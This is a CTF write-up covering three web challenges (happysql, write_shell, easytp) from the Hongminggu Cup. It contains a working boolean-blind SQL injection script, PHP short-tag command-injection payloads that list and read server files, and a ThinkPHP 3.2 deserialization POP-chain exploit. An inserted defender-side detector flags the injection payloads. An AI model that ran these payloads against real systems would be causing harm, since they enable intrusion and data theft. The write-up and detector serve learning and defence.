
红明谷杯 (Hongminggu Cup) partial WEB write-up

happysql

  • A quick fuzz shows that if, spaces, or, and, information, single quotes, benchmark, sleep, =, like, +, - and a few other keywords are filtered

  • Double quotes are not filtered, though. The challenge query happens to wrap the value in a double-quoted string, and # is not filtered either, so it is easy to break out of the string.


    Logical operators such as or and and can simply be replaced with ||. The equals sign can be replaced with regexp or strcmp, and substring extraction can be done with locate. With ||, the login succeeds and redirects to home.php as soon as either side evaluates true.


  • Use a boolean blind injection based on runtime errors (http://www.plasf.cn/articles/spatial_functions_blind_inject.html); for example exp(710) overflows and raises an error

  • make_set can stand in for if, so the following payload can be constructed:
    username=a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#&password=
  • If the guess is correct, exp overflows and the SQL statement fails, returning Username or password error!
  • If the guess is wrong, 1 is returned, exp does not overflow and the query runs normally.
  • Since information is filtered, mysql.innodb_index_stats is used instead, which works. From the earlier step the database is already known to be ctf, so the table name is guessed directly:
    payload = {
        'username':'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/regexp/**/binary/**/0x637466),%s)),%s),710,1))#'%(ord2hex(j),i,i),
        'password':''
    }


  • This yields the table name f1ag, but the innodb method cannot recover the column names; it is easy, however, to test that there are exactly two columns.


  • Column-name-free injection can then be used directly. Putting the analysis above together, the final EXP is:
# coding=utf-8
import requests


def ord2hex(string):
    # Encode a string as a quote-free MySQL hex literal, e.g. 'a' -> '0x61'
    result = ""
    for i in string:
        result += hex(ord(i)).replace('0x', '')
    return '0x' + result


# Character set to guess from, one flag position at a time
tables = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-}{,_'
flag = ''
url = "http://eci-2ze2jur5bqu7g7b1eaws.cloudeci1.ichunqiu.com/login.php"
for i in range(1, 70):
    for j in tables:
        payload = {
            # strcmp is 0 on a correct guess, so make_set yields '' and exp does not
            # overflow; any other value selects 710 and exp(710) errors out
            'username': 'a"||exp(make_set(strcmp((locate(binary/**/%s,(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),%d)),%d),710,1))#' % (ord2hex(j), i, i),
            'password': ''
        }
        resp = requests.post(url, data=payload)
        # print(payload['username'])
        if 'home.php' in resp.text:
            flag = flag + j
            print(flag)
            break
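A defender-side check, added here and not part of the original write-up: the blacklist above failed because it matched raw text, while the payloads used /**/ for whitespace, || for or, and make_set, strcmp, locate and exp() as substitutes. The detector below normalizes each form field the way MySQL would read it and scores the substitutions this section describes against a few constructed login request log lines (the two injection bodies are this section's payloads with the placeholders filled in; the log format and signature names are assumptions).

```python
import re
from urllib.parse import parse_qs

# Constructed sample request-log lines ("METHOD PATH BODY"). Lines 1 and 3 are the
# injection bodies from this section (placeholders filled in); line 2 is a benign login.
SAMPLE_LOGS = [
    'POST /login.php username=a"||exp(make_set((database()/**/regexp/**/binary/**/0x637466),0x373130,0x31))#&password=',
    'POST /login.php username=alice&password=hunter2',
    'POST /login.php username=a"||exp(make_set(strcmp((locate(binary/**/0x41,(select/**/group_concat(x.2)/**/from/**/(select/**/2/**/union/**/select/**/*/**/from/**/f1ag)x),1)),1),710,1))#&password=',
]

INLINE_COMMENT = re.compile(r'/\*.*?\*/', re.S)

def normalize(value):
    """Undo what the blacklist missed: /**/ standing in for whitespace, and letter case."""
    return INLINE_COMMENT.sub(' ', value).lower()

# One signature per substitution described in the write-up.
SIGNATURES = {
    'double_quote_escape': re.compile(r'"\s*\|\|'),           # " closed, || replaces or
    'comment_terminator':  re.compile(r'#\s*$'),               # trailing # drops the rest of the query
    'exp_overflow_oracle': re.compile(r'\bexp\s*\('),          # exp(710) runtime-error oracle
    'make_set_as_if':      re.compile(r'\bmake_set\s*\('),     # make_set replaces if
    'regexp_strcmp_as_eq': re.compile(r'\b(regexp|strcmp)\b'), # replacements for =
    'locate_as_substr':    re.compile(r'\blocate\s*\('),       # replaces substr / like
    'hex_string_literal':  re.compile(r'\b0x[0-9a-f]{2,}\b'),  # string literals without quotes
}

def scan_field(value):
    """Return the names of all signatures matching the normalized field value."""
    norm = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log_line(line):
    """Return {field: [signatures]} for the form fields of one log line that matched."""
    _method, _path, body = line.split(' ', 2)
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        matched = sorted({sig for v in values for sig in scan_field(v)})
        if matched:
            hits[field] = matched
    return hits

def scan_logs(lines, min_signatures=3):
    """Flag a request when one field trips at least min_signatures distinct signatures."""
    flagged = []
    for line in lines:
        hits = scan_log_line(line)
        if any(len(sigs) >= min_signatures for sigs in hits.values()):
            flagged.append((line, hits))
    return flagged
```

Requiring several distinct signatures per field keeps a lone # or 0x literal in a legitimate value from firing, while either of the write-up's payloads trips six or seven at once.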


write_shell

  • Simple challenge
  • Use PHP short tags to bypass the filter on php, and $IFS$9 in place of spaces.
?action=upload&data=<?=`ls\$IFS\$9/`?>
  • This directly returns the file listing
!whatyouwantggggggg401.php
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
  • Just read it with a wildcard
?action=upload&data=<?=`cat\$IFS\$9/*.ph*`?>


easytp

  • Directory scanning finds the source: www.zip
  • ThinkPHP 3.2; the Home controller has a method that calls unserialize
  • A POP chain found online turns out to work: https://www.jianshu.com/p/41782991b4b2

  • Error-based injection reveals a database called tp containing a table called f14g (I wasted a long time trying to get a shell via MySQL log export; the flag was in the database all along)


  • Exp
<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // must be enabled to read files
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,concat(mid((select f14g from tp.f14g),20,70),0x7e),1);#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}